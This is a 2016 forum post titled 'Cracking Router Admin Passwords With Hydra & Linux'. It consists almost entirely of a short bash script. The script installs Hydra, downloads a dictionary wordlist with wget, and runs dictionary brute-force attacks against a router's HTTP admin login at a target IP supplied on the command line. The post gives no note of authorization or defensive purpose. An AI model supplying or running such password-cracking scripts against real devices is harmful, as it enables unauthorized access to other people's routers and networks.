PC & IT SUPPORT MADE EASY FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Crack & Cracking Router Admin Passwords With Hydra & Linux

Go down

Crack & Cracking Router Admin Passwords With Hydra & Linux Empty Crack & Cracking Router Admin Passwords With Hydra & Linux

Post by jamied_uk 28th September 2016, 02:06




Code:


#!/bin/bash
# sudo apt-get install -y hydra
# wget http://www.math.sjsu.edu/~foster/dictionary.txt
# Usage: ./crack.sh "192.168.10.10"
# (IP)
#
myvar="$@"
hydra -l admin -P ~/scripts/Router_Cracker/dictionary.txt -e ns -vV "$myvar" http-get
hydra "$myvar" -L login.txt -P dictionary.txt -t 1 -e ns -V  http-get
jamied_uk
jamied_uk
Admin

Posts : 3053
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum